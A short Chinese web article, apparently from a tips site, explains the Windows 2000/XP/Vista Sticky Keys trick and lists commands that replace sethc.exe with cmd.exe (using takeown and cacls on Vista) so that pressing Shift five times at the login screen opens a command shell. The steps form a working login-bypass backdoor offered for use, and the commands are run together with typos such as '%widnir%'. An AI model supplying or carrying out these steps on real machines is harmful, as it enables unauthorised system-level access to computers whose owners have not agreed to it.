WINDOWS漏洞:粘置键
摘要:在windows2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就...
在windows2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/
XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd%widnir%system32dllcache
rensethc.exe*.ex~
cd%widnir%system32
copy/ycmd.exesethc.exe
VISTA:
takeown/fc:windowssystem32sethc.exe
caclsc:windowssystem32sethc.exe/Gadministrator:F
然后按XP方法替换文件
在登录界面按5此SHIFT,出来cmdshell,然后……
【WINDOWS漏洞:粘置键】相关文章:
★ win2003 iis6.0 NET2.0的Server Application Unavailable的问题!
★ persits.jpeg.1 Invaild 5th argument, must be a long integer
上一篇:
从DV制作VCD的软件方法
下一篇:
ESC键不太为人知的几个妙用